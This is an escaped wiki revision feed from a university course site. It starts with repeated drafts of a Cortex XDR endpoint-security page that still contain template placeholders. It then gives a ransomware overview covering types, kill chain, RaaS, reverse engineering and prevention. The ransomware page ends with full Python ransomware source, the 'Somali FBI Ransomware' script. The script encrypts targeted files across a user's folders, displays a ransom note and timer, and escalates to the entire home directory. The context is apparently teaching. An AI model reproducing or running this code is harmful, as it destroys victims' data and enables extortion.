Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Enter these commands in the shell&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Device to be used with this documentation]]&lt;br /&gt;
[[Maybe another device to be used with this documentation]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11234</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11234"/>
		<updated>2023-01-28T20:01:17Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: /* Summary */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Endpoint security is a critical component of an organization&#039;s overall security strategy. It involves protecting devices such as laptops, smartphones, and servers from threats that can compromise the confidentiality, integrity, and availability of sensitive data. Cortex XDR is a next-generation endpoint security solution that provides advanced threat detection and response capabilities to help organizations protect their endpoints from a wide range of threats, including malware, ransomware, and advanced persistent threats (APTs).&lt;br /&gt;
&lt;br /&gt;
Cortex XDR uses a combination of artificial intelligence and machine learning algorithms to detect and respond to threats in real-time. It continuously monitors network traffic and endpoints for suspicious activity and immediately alerts security teams to potential threats. Additionally, Cortex XDR provides detailed forensic analysis and incident response capabilities, allowing organizations to quickly contain and remediate threats.&lt;br /&gt;
&lt;br /&gt;
With Cortex XDR, organizations can proactively protect their endpoints from known and unknown threats, and quickly respond to any incidents that do occur. This helps to minimize the risk of data breaches and ensure that sensitive information remains secure.&lt;br /&gt;
&lt;br /&gt;
Cortex XDR can be used in conjunction with other security solutions, such as firewalls, intrusion detection and prevention systems, and security information and event management (SIEM) platforms, to provide a comprehensive security posture for the organization. It also provides a simplified, centralized management console for security teams to easily manage and monitor their endpoint security posture.&lt;br /&gt;
&lt;br /&gt;
In summary, Cortex XDR is a powerful endpoint security solution that uses artificial intelligence and machine learning to detect and respond to threats in real-time, and provides incident response and forensic analysis capabilities to help organizations quickly contain and remediate threats, while providing a centralized, easy-to-use management console for security teams.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64&lt;br /&gt;
* Packages: git emacs&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Enter these commands in the shell&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Device to be used with this documentation]]&lt;br /&gt;
[[Maybe another device to be used with this documentation]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11229</id>
		<title>Endpoint security using Cortex XDR</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Endpoint_security_using_Cortex_XDR&amp;diff=11229"/>
		<updated>2023-01-28T19:58:45Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: Created page with &amp;quot;== Summary ==   Description what this documentation is about.  == Requirements ==  * Operating system: Ubuntu 18.04 bionic amd64 * Packages: git emacs  In order to complete these steps, you must have followed Some Other Documentation before.  == Description ==  === Step 1 ===  Enter these commands in the shell   echo foo  echo bar  === Step 2 ===  Make sure to read  * War and Peace * Lord of the Rings * The Baroque Cycle  == Used Hardware ==  Device to be used with...&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Description what this documentation is about.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64&lt;br /&gt;
* Packages: git emacs&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Enter these commands in the shell&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Device to be used with this documentation]]&lt;br /&gt;
[[Maybe another device to be used with this documentation]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>AAmmann</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Ransomware&amp;diff=10879</id>
		<title>Ransomware</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Ransomware&amp;diff=10879"/>
		<updated>2023-01-08T11:57:22Z</updated>

		<summary type="html">&lt;p&gt;AAmmann: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction to Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Ransomware is a type of malware that takes control over a victim‘s PC or Data, and blocking access to it, in an attempt to extort money. The word &amp;quot;ransomware&amp;quot; is a combination of the words &amp;quot;ransom&amp;quot; and &amp;quot;software.&amp;quot; The attackers hold the victim&#039;s data hostage and demand a payment (ransom) in exchange for the decryption key that will unlock the encrypted files.Conventionally the attacker demands that the ransom is paid in a hard to trace digital currency like Monero, Ethereum or Bitcoin.&lt;br /&gt;
Modern day state of the art Ransomwares (which are mostly Cryptographic) use AES-256 to encrypt files and require payment for decryption.&lt;br /&gt;
It is typically attained from deceptive email links or websites. Currently, there are two types of ransomwares: Cryptographic and Non-Cryptographic based.&lt;br /&gt;
&lt;br /&gt;
== Role of Cryptography in Ransomware ==&lt;br /&gt;
&lt;br /&gt;
Malware / Ransomware use cryptography in order to hide its own code so that antivirus or security researchers cannot identify the actual code easily, communicate with its own command and control (C&amp;amp;C) Server and to encrypt the files on the victim machine.&lt;br /&gt;
&lt;br /&gt;
A cryptographic system can have the following components:&lt;br /&gt;
* Plaintext&lt;br /&gt;
* Encryption key&lt;br /&gt;
* Ciphertext, which is the encrypted text&lt;br /&gt;
* Encryption algorithm, also called cipher&lt;br /&gt;
* Decryption algorithm&lt;br /&gt;
* There are two types of cryptographic algorithms based on the kind of key used:&lt;br /&gt;
** Symmetric&lt;br /&gt;
** Asymmetric&lt;br /&gt;
&lt;br /&gt;
Advanced Encryption Standard (AES), the most used encryption algorithm in ransomwares uses a symmetric key. More advanced CGRs use a combation of both Symmetric and Asymmetric Keys (CryptoLocker is known to use both a symmetric key and an asymmetric key RSA)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Picture1.png|500px|thumb|right| Symmetric key exchange &amp;lt;ref name=&amp;quot;keyexchange&amp;quot;/&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
== Cryptographic Ransomware (CGR) ==&lt;br /&gt;
&lt;br /&gt;
Cryptographic Ransomware (CGR) encrypts the files of the victim‘s device using „Strong Cryptographic“ Methods. These are methods that are considered highly resistant to cryptanalysis. The victim is informed of the encryption during an attack. A Timer is another component of the attack that is used to give the victim the feeling of urgency. There is no other easy way to decrypt the data than using the decryption key. &amp;lt;br /&amp;gt;&lt;br /&gt;
The main currencies used for paying the ransom are digital cryptocurrencies like Monero, Etherium or Bitcoin, because they are:&lt;br /&gt;
* Anonymous&lt;br /&gt;
* Difficult to track&lt;br /&gt;
* Transactions irreversible&lt;br /&gt;
&lt;br /&gt;
CGR is not just one ransomware, but a family of malware that behave in a similar way&lt;br /&gt;
Most common CGRs are:&lt;br /&gt;
* Jigsaw&lt;br /&gt;
* WannaCry&lt;br /&gt;
* Crypto Locker&lt;br /&gt;
* Police Ransomware&lt;br /&gt;
* Dirty Decrypt&lt;br /&gt;
* Torrent Locker&lt;br /&gt;
* Batch file Ransomware&lt;br /&gt;
* CryptoWall&lt;br /&gt;
&lt;br /&gt;
=== Crypto Locker ===&lt;br /&gt;
&lt;br /&gt;
CryptoLocker comes is a plethora of different forms, one of which the Torrent Locker ransomware. The standard variant Uses the advanced encryption standard AES-128 cryptosystem to encrypt the data on the host machine. In the latter variant, Torrent Locker, on the other hand, encrypts users’s files with the most advanced encryption standard implementation AES-256-CBC. AES 128 uses 10 rounds while AES 256 uses 14 rounds. The higher the number of rounds, the more complex the encryption and is therefore the reason why Torrent Locker is more ”secure”.&lt;br /&gt;
&lt;br /&gt;
== Non-Cryptographic Ransomware (NCR) ==&lt;br /&gt;
&lt;br /&gt;
NCRs unlike CGRs Do not use any encryption and are applications that are designed to restrict computer interaction by locking screen or modifying Master Boot Record (MBR). They are relatively weak compared to CGR.&lt;br /&gt;
Examples of NCR include:&lt;br /&gt;
* WinLocker&lt;br /&gt;
* Reveton&lt;br /&gt;
&lt;br /&gt;
=== Screen-Lockers ===&lt;br /&gt;
&lt;br /&gt;
The main goal of screen-lockers is to restrict access to a victim’s system at the operating system level, meaning that the affected device or system cannot be used. The only thing that is displayed when booting the system, is typically a message demanding a ransom.&lt;br /&gt;
&lt;br /&gt;
=== Extortionware ===&lt;br /&gt;
&lt;br /&gt;
Extortionware is used by attackers to extort money from their victims, by gathering as much information as possible and stealing personal information and data that the victim wants to keep private. The attackers then usually threaten to release it, if the ransom is not paid. Mostly, none of the victim’s data is encrypted and none of their systems is blocked, but they have to pay if they do not want their private information to be leaked.&lt;br /&gt;
&lt;br /&gt;
== Ransomware Kill-Chain ==&lt;br /&gt;
&lt;br /&gt;
[[File:Picture2.png|1000px|thumb|center| Ransomware Kill Chain&amp;lt;ref name=&amp;quot;attackchain&amp;quot;/&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
* Distribution campaign – attackers use techniques like social engineering and weaponized websites to trick or force users to download a dropper which kicks off the infection&lt;br /&gt;
* Malicious code infection – the dropper downloads an executable which installs the ransomware itself&lt;br /&gt;
* Malicious payload staging – the ransomware sets up, embeds itself in a system, and establishes persistency to exist beyond a reboot&lt;br /&gt;
* Scanning – the ransomware searches for content to encrypt, both on the local computer and the network accessible resources&lt;br /&gt;
* Encryption – the discovered files are encrypted&lt;br /&gt;
* Payday – a ransom note is generated, shown to the victim, and the hacker waits to collect on the ransom&lt;br /&gt;
&lt;br /&gt;
=== Distribution Types Kill-Chain stage ===&lt;br /&gt;
&lt;br /&gt;
==== Malicious Spam Emails ====&lt;br /&gt;
&lt;br /&gt;
In order to gain access and infect a system, the attacker sends a huge amount of malicious spam emails to as many people as possible. Known example are phishing emails which target specific persons or companies. Via social engineering and deception tactics, victims are tricked into downloading malicious files or clicking on malicious links, which if opened infect the victim&#039;s computer.&lt;br /&gt;
&lt;br /&gt;
==== Malicious Advertising ====&lt;br /&gt;
&lt;br /&gt;
Malicious advertising is a method for distribution malicious software by abusing advertisements. If an infected website is visited by a victim, malicious advertisements redirect the browser to another page. This page contains an exploits which infects the victim&#039;s computer. This happens while the victim does not notice any of it.&lt;br /&gt;
&lt;br /&gt;
==== Scareware ==== &lt;br /&gt;
&lt;br /&gt;
Scareware is used to scare victim&#039;s into downloading malicious software. Example would be a pop-up in the victim&#039;s browser telling them that their computer might be infected and they need a specific software to remove the problem. Often real looking banners, logos and names of legitimate antimalware-solution companies are used to lure victims into downloading malicious software.&lt;br /&gt;
&lt;br /&gt;
=== Encryption Kill-Chain stage ===&lt;br /&gt;
&lt;br /&gt;
* Upon Infection, Cryptolocker connects to C&amp;amp;C and requests a public key&lt;br /&gt;
* RSA public and secret key pair is generated for the victim machine&lt;br /&gt;
* Public Key sent to the victim machine, Secret Key stays with C&amp;amp;C&lt;br /&gt;
* Ransomware generates AES Symmetric key for file encryption&lt;br /&gt;
* Encrypt the AES key with the RSA public key&lt;br /&gt;
* In order to decrypt files, AES key must be decrypted with private key in the C&amp;amp;C server.&lt;br /&gt;
&lt;br /&gt;
== Ransomware as a Service (RaaS) ==&lt;br /&gt;
&lt;br /&gt;
Ransomware as a Service is a growing business model on the dark web used by ransomware developers to distribute and sell their malware as service. Anybody, even without much technical knowledge, can execute ransomware attacks by just subscribing to this service. RaaS kits are rather easy to find on the dark web, where they are advertised like a normal product. These services may also offer a dashboard where the attacker has an overview of the progress, or even documentation with a step-by-step guide on how to use the ransomware. There are different types of RaaS revenue models, like a monthly subscription for a flat fee, a one-time license fee or a monthly fee but where a specific percentage of the ransomware profits is going to the RaaS-provider.&lt;br /&gt;
&lt;br /&gt;
== Tools for Reverse Engineering and WannaCry ==&lt;br /&gt;
&lt;br /&gt;
First seen in 2017, WannaCry Ransomware has a series of elements. It enters victim in the form of a „dropper“ which contains an executable that encrypts and decrypts files, a copy of Tor Browser and the Encryption Keys (Kill Switch). It is timed like Jigsaw Ransomware and should the victim fails to pay on time, all files are deleted including the encryption key. The ransomware demands 0.025 bitcoin ransom but can be much more for corperations&lt;br /&gt;
&lt;br /&gt;
=== GHIDRA ===&lt;br /&gt;
&lt;br /&gt;
Ghidra is a software reverse engineering (SRE) suite of tools developed by NSA&#039;s Research Directorate in support of the Cybersecurity mission.&lt;br /&gt;
&lt;br /&gt;
[[File:Picture3.png|200px|thumb|right| Ghidra open source software &amp;lt;ref name=&amp;quot;ghidra&amp;quot;/&amp;gt;]]&lt;br /&gt;
[[File:Picture4.png|500px|thumb|center| Ghidra being used to reverse engineer WannaCry]]&lt;br /&gt;
&lt;br /&gt;
== Mitigation ==&lt;br /&gt;
&lt;br /&gt;
=== Prevention ===&lt;br /&gt;
&lt;br /&gt;
To protect against ransomware, it is important to regularly update software and security systems, avoid opening suspicious emails and links, and use strong, unique passwords for all accounts. It is also advisable to regularly back up important data to an external drive or cloud storage to ensure that it can be recovered in the event of an attack.&lt;br /&gt;
&lt;br /&gt;
There are several steps that individuals and organizations can take to prevent ransomware attacks:&lt;br /&gt;
&lt;br /&gt;
*Keep software and security systems up to date: Installing updates and patches as they become available can help to fix vulnerabilities that could be exploited by ransomware.&lt;br /&gt;
&lt;br /&gt;
*Avoid opening suspicious emails and links: Ransomware is often delivered through email attachments or links. It is important to be cautious when opening emails from unknown senders, and to avoid clicking on links or downloading attachments from unfamiliar sources.&lt;br /&gt;
&lt;br /&gt;
*Use strong, unique passwords: Using strong, unique passwords for all accounts can help to prevent unauthorized access to accounts and systems.&lt;br /&gt;
&lt;br /&gt;
*Use reputable antivirus software: Antivirus software can help to detect and block ransomware before it can infect a system.&lt;br /&gt;
&lt;br /&gt;
*Back up important data regularly: Regularly backing up data to an external drive or cloud storage can help to ensure that it can be recovered in the event of a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
*Implement network segregation: Segmenting a network into smaller, isolated segments can help to contain the spread of ransomware within an organization.&lt;br /&gt;
&lt;br /&gt;
*Educate employees: Training employees to recognize and report suspicious activity can help to prevent ransomware attacks.&lt;br /&gt;
&lt;br /&gt;
*Consider ransomware insurance: Ransomware insurance can provide financial protection in the event of an attack.&lt;br /&gt;
&lt;br /&gt;
By following these best practices, individuals and organizations can significantly reduce their risk of falling victim to a ransomware attack.&lt;br /&gt;
&lt;br /&gt;
=== Securing Networks and Systems before an attack ===&lt;br /&gt;
&lt;br /&gt;
A “Prevention is better than cure” approach includes:&lt;br /&gt;
* Incident Response Plan&lt;br /&gt;
* Backups&lt;br /&gt;
* Antivirus Solutions&lt;br /&gt;
* Disable Macros scripts&lt;br /&gt;
* Keeping Systems up to date&lt;br /&gt;
* Restricted Network Access&lt;br /&gt;
&lt;br /&gt;
=== Securing Networks and Systems during an attack ===&lt;br /&gt;
&lt;br /&gt;
* Act Immediately&lt;br /&gt;
* Perform an Attack Analysis&lt;br /&gt;
* Determine if a decryptor is available&lt;br /&gt;
* Restore from a previous snapshot or backup&lt;br /&gt;
* Report the infection&lt;br /&gt;
&lt;br /&gt;
== Python Based CGR ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Summary ===&lt;br /&gt;
&lt;br /&gt;
This section demonstrates how to create a simple CGR in python. Instead of using standard AES for encryption, this application uses a Fernet key due to its simplicity. Fernet keys use a combination of two smaller keys:&lt;br /&gt;
* A 128 bit AES encryption key&lt;br /&gt;
* A 128 bit SHA256 signing key&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64&lt;br /&gt;
* Packages and Software: VMware Workstation Pro 12.x, Python 3.x, Anaconda Navigator, Atom IDE&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Install Python 3.x and Anaconda Navigator. Clone the project from the github page: https://git.fh-campuswien.ac.at/c1710475138/somali-cryptographic-ransomware.git&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Main Secion of the Code ===&lt;br /&gt;
&lt;br /&gt;
  import os&lt;br /&gt;
  import webbrowser&lt;br /&gt;
  from os.path import expanduser&lt;br /&gt;
  from cryptography.fernet import Fernet #fernet keys have two smaller keys, a 128 bit AES key and a 128 bit SHA256 signing key&lt;br /&gt;
  import tkinter as tk&lt;br /&gt;
  from PIL import ImageTk, Image&lt;br /&gt;
  from multiprocessing import Process&lt;br /&gt;
  from threading import Thread&lt;br /&gt;
  import time&lt;br /&gt;
  from pathlib import Path&lt;br /&gt;
&lt;br /&gt;
  #Welcome to Somali FBI Ransomware! To start encryption:&lt;br /&gt;
  #python3 main.py --action encrypt&lt;br /&gt;
  #To decrypt files:&lt;br /&gt;
  #python3 main.py --action decrypt --keyfile ./path/to/key&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
  root = tk.Tk()&lt;br /&gt;
  root.title(&#039;Terminal&#039;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  # root2 = tk.Tk()&lt;br /&gt;
  # root2.title(&#039;FBI SOMALIA ALERT!&#039;)&lt;br /&gt;
  # root.wm_attributes(&#039;-fullscreen&#039;, &#039;true&#039;)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  class Malware(object):&lt;br /&gt;
&lt;br /&gt;
      def __init__(self):&lt;br /&gt;
          self.key = None  # key to encrypt the files&lt;br /&gt;
          self.cryptor = None  # The encryptor&lt;br /&gt;
          self.file_ext_targets = [&#039;jpg&#039;, &#039;txt&#039;, &#039;png&#039; &#039;zip&#039;]  # our ransomware will encrypt txt files&lt;br /&gt;
          self.my_file = Path(&amp;quot;~/Desktop/MENSA.txt&amp;quot;)  # the system will look for this file before starting the decryption process.&lt;br /&gt;
          self.flag = 0&lt;br /&gt;
          self.time = 1000000&lt;br /&gt;
&lt;br /&gt;
      def mainscreen(self):&lt;br /&gt;
          termf = tk.Frame(root, height=400, width=500)&lt;br /&gt;
          w = tk.Label(root, text=&amp;quot;Something went wrong...&amp;quot;)&lt;br /&gt;
          button = tk.Button(text=&#039;Close&#039;, command=self.quitApp).pack()&lt;br /&gt;
          w.pack()&lt;br /&gt;
          root.mainloop()&lt;br /&gt;
          &#039;&#039;&#039;&lt;br /&gt;
          #This is a method that generates a key to unlock files and pass it to the crypter&lt;br /&gt;
          #verifies the key for decryption&lt;br /&gt;
          &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
      def quitApp(self):&lt;br /&gt;
          root.destroy()&lt;br /&gt;
          ransom.writeKey(&amp;quot;key&amp;quot;)&lt;br /&gt;
          ransom.encryptRoot(local_root)&lt;br /&gt;
&lt;br /&gt;
          # canvas.delete()&lt;br /&gt;
          &#039;&#039;&#039;&lt;br /&gt;
               self.root2 = tk.Tk()&lt;br /&gt;
          #self.root2.wm_attributes(&#039;-fullscreen&#039;, &#039;true&#039;)&lt;br /&gt;
          #self.canvas = tk.Canvas(self.root2, width=1366, height=800)&lt;br /&gt;
          #self.img = tk.PhotoImage(file=&amp;quot;data/FBI.PNG&amp;quot;)&lt;br /&gt;
          #self.canvas.create_image(20, 20, anchor=tk.NW, image=self.img)&lt;br /&gt;
          #self.canv as.pack()&lt;br /&gt;
          #root2.mainloop()&lt;br /&gt;
          &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
          self.tick(30) #timer for encryption&lt;br /&gt;
&lt;br /&gt;
      def tick(self, t):&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
          while t:&lt;br /&gt;
              os.system(&#039;sh mi6.sh&#039;)  #shell script to change the background is run constantly&lt;br /&gt;
&lt;br /&gt;
              if self.flag == 0:&lt;br /&gt;
                  time.sleep(5)&lt;br /&gt;
                  self.note = webbrowser.open(&#039;file://&#039; + os.path.realpath(&#039;note.html&#039;))  #Ransomware not is generated&lt;br /&gt;
                  self.flag += 1&lt;br /&gt;
&lt;br /&gt;
              mins, secs = divmod(t, 60)&lt;br /&gt;
              timer = &#039;{:02d}:{:02d}&#039;.format(mins, secs)&lt;br /&gt;
              print(timer, end=&amp;quot;\r&amp;quot;)&lt;br /&gt;
              time.sleep(1)&lt;br /&gt;
              if self.my_file.is_file():&lt;br /&gt;
                  webbrowser.open(&#039;file://&#039; + os.path.realpath(&#039;success.html&#039;))   #Once the the ransom is payed, the success page is displayed&lt;br /&gt;
                  ransom.readKey(&#039;keyfile&#039;)&lt;br /&gt;
                  ransom.encryptRoot(local_root, encrypted=True)&lt;br /&gt;
                  break&lt;br /&gt;
&lt;br /&gt;
              t -= 1&lt;br /&gt;
&lt;br /&gt;
          if t == 0 and not self.my_file.is_file():&lt;br /&gt;
              webbrowser.open(&#039;file://&#039; + os.path.realpath(&#039;fail.html&#039;))  #If timer runs out and there are no ransom paid, fail page is displayed&lt;br /&gt;
              sys_root = expanduser(&amp;quot;~&amp;quot;)  #set new encryption directory to the root&lt;br /&gt;
              ransom.generateKey()    #generate a key&lt;br /&gt;
              ransom.writeKey(&amp;quot;keyfile&amp;quot;) #write a key&lt;br /&gt;
              ransom.encryptRoot(sys_root)    #start the encryption process&lt;br /&gt;
&lt;br /&gt;
      def generateKey(self):&lt;br /&gt;
          self.key = Fernet.generate_key()&lt;br /&gt;
          self.cryptor = Fernet(self.key)&lt;br /&gt;
&lt;br /&gt;
          &#039;&#039;&#039;&lt;br /&gt;
          read the key for decryption&lt;br /&gt;
          &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
      def readKey(self, keyfileName):&lt;br /&gt;
&lt;br /&gt;
          with open(keyfileName, &amp;quot;rb&amp;quot;) as f:&lt;br /&gt;
              self.key = f.read()&lt;br /&gt;
              self.cryptor = Fernet(self.key)&lt;br /&gt;
&lt;br /&gt;
      &#039;&#039;&#039;&lt;br /&gt;
      #Save decryption key to a file&lt;br /&gt;
      &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
      def writeKey(self, keyFileName):&lt;br /&gt;
          print(self.key)&lt;br /&gt;
          with open(keyFileName, &amp;quot;wb&amp;quot;) as f:&lt;br /&gt;
              f.write(self.key)&lt;br /&gt;
&lt;br /&gt;
      &#039;&#039;&#039;&lt;br /&gt;
      encrypt or decrypt files from root directory&lt;br /&gt;
      &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
      def encryptRoot(self, rootDir, encrypted=False):&lt;br /&gt;
          for root, _, files in os.walk(rootDir):&lt;br /&gt;
              for f in files:&lt;br /&gt;
                  abs_files_path = os.path.join(root, f)&lt;br /&gt;
                  # pass if no target files is present in current folder&lt;br /&gt;
                  if not abs_files_path.split(&amp;quot;.&amp;quot;)[-1] in self.file_ext_targets:&lt;br /&gt;
                      continue&lt;br /&gt;
                  self.encryptFile(abs_files_path, encrypted=encrypted)&lt;br /&gt;
&lt;br /&gt;
      &#039;&#039;&#039;&lt;br /&gt;
      encrypt and decrypt files&lt;br /&gt;
      &#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
      def encryptFile(self, filePath, encrypted=False):&lt;br /&gt;
          with open(filePath, &amp;quot;rb+&amp;quot;) as f:&lt;br /&gt;
              _data = f.read()&lt;br /&gt;
              if not encrypted:&lt;br /&gt;
                  # perform encryption&lt;br /&gt;
                  print()&lt;br /&gt;
                  print(f&amp;quot;File Contents before encryption: {_data}&amp;quot;)&lt;br /&gt;
                  data = self.cryptor.encrypt(_data)&lt;br /&gt;
                  print(f&amp;quot;File contents after encryption: {data}&amp;quot;)&lt;br /&gt;
              else:&lt;br /&gt;
                  # decrypt&lt;br /&gt;
                  data = self.cryptor.decrypt(_data)&lt;br /&gt;
                  print(f&amp;quot;File content before encryption: {data}&amp;quot;)&lt;br /&gt;
              f.seek(0)&lt;br /&gt;
              f.write(data)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
  if __name__ == &amp;quot;__main__&amp;quot;:&lt;br /&gt;
      # sys_root = expanduser(&amp;quot;~&amp;quot;)    # Use to encrypt every folder from root&lt;br /&gt;
      local_root = expanduser(&amp;quot;~/Downloads&amp;quot;)  # Use to encrypt specific folder&lt;br /&gt;
&lt;br /&gt;
      import argparse&lt;br /&gt;
&lt;br /&gt;
      parser = argparse.ArgumentParser()&lt;br /&gt;
      parser.add_argument(&amp;quot;--action&amp;quot;, required=True)&lt;br /&gt;
      parser.add_argument(&amp;quot;--keyfile&amp;quot;)&lt;br /&gt;
&lt;br /&gt;
      args = parser.parse_args()&lt;br /&gt;
      action = args.action.lower()&lt;br /&gt;
      keyfile = args.keyfile&lt;br /&gt;
&lt;br /&gt;
      ransom = Malware()&lt;br /&gt;
&lt;br /&gt;
      if action == &amp;quot;decrypt&amp;quot;:&lt;br /&gt;
          if keyfile is None:&lt;br /&gt;
              print(&amp;quot;Path to key must be specified after --keyfile for decryption&amp;quot;)&lt;br /&gt;
          else:&lt;br /&gt;
              ransom.readKey(key)&lt;br /&gt;
              ransom.encryptRoot(local_root, encrypted=True)&lt;br /&gt;
      elif action == &amp;quot;encrypt&amp;quot;:&lt;br /&gt;
          Thread(target=ransom.generateKey()).start()&lt;br /&gt;
          Thread(target=ransom.mainscreen()).start()&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* A. Chuquilla, T. Guarda and G. Ninahualpa Quiña, &amp;quot;Ransomware -&lt;br /&gt;
WannaCry Security is everyone&#039;s,&amp;quot; 2019 14th Iberian Conference on&lt;br /&gt;
Information Systems and Technologies (CISTI), Coimbra, Portugal,&lt;br /&gt;
2019, pp. 1-4, doi: 10.23919/CISTI.2019.8760749&lt;br /&gt;
&lt;br /&gt;
